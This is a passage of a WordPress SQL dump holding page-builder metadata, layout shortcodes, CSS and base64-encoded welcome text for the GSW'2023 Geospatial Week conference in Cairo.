TIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3bd334\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5f86e4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fc561a1\",\"elType\":\"widget\",\"settings\":{\"read_more_button_text\":\"Read more\",\"filter_all_text\":\"View all\",\"pagination_load_more_text\":\"Load more\",\"post_meta_separator\":\"\\u2022\"},\"elements\":[],\"widgetType\":\"the7_elements\"}],\"isInner\":false}],\"isInner\":false}]'),
(6416,2392,'_elementor_page_assets','a:0:{}'),
(6417,2167,'_elementor_page_settings','a:15:{s:19:\"the7_document_title\";s:9:\"slideshow\";s:41:\"the7_document_slideshow_revolution_slider\";s:28:\"the7-software-company-slider\";s:42:\"the7_document_disabled_header_color_scheme\";s:5:\"light\";s:41:\"the7_document__background_below_slideshow\";s:8:\"disabled\";s:39:\"the7_document_fancy_header_color_scheme\";s:5:\"light\";s:30:\"the7_document_sidebar_position\";s:8:\"disabled\";s:28:\"the7_document_show_footer_wa\";s:1:\"0\";s:25:\"the7_document_padding_top\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:27:\"the7_document_padding_right\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:28:\"the7_document_padding_bottom\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:26:\"the7_document_padding_left\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:32:\"the7_document_mobile_padding_top\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:34:\"the7_document_mobile_padding_right\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:35:\"the7_document_mobile_padding_bottom\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:33:\"the7_document_mobile_padding_left\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}}'),
(6418,2393,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}.vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6419,2393,'_wp_page_template','default'),
(6420,2393,'_elementor_edit_mode','builder'),
(6421,2393,'_elementor_template_type','wp-page'),
(6422,2393,'_elementor_version','3.7.8'),
(6423,2393,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),
(6424,2393,'_elementor_page_assets','a:0:{}'),
(6425,2393,'_elementor_page_settings','a:15:{s:19:\"the7_document_title\";s:9:\"slideshow\";s:41:\"the7_document_slideshow_revolution_slider\";s:28:\"the7-software-company-slider\";s:42:\"the7_document_disabled_header_color_scheme\";s:5:\"light\";s:41:\"the7_document__background_below_slideshow\";s:8:\"disabled\";s:39:\"the7_document_fancy_header_color_scheme\";s:5:\"light\";s:30:\"the7_document_sidebar_position\";s:8:\"disabled\";s:28:\"the7_document_show_footer_wa\";s:1:\"0\";s:25:\"the7_document_padding_top\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:27:\"the7_document_padding_right\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:28:\"the7_document_padding_bottom\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:26:\"the7_document_padding_left\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:32:\"the7_document_mobile_padding_top\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:34:\"the7_document_mobile_padding_right\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:35:\"the7_document_mobile_padding_bottom\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:33:\"the7_document_mobile_padding_left\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}}'),
(6426,2167,'_dt_header_show','1'),
(6427,2167,'_dt_header_layer_show_bg_and_paddings',''),
(6428,2167,'_elementor_css','a:7:{s:4:\"time\";i:1665148472;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),
(6429,2394,'_elementor_edit_mode','builder'),
(6430,2394,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}.vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6431,2394,'_wp_page_template','default'),
(6432,2394,'_elementor_template_type','wp-page'),
(6433,2394,'_elementor_version','3.7.8'),
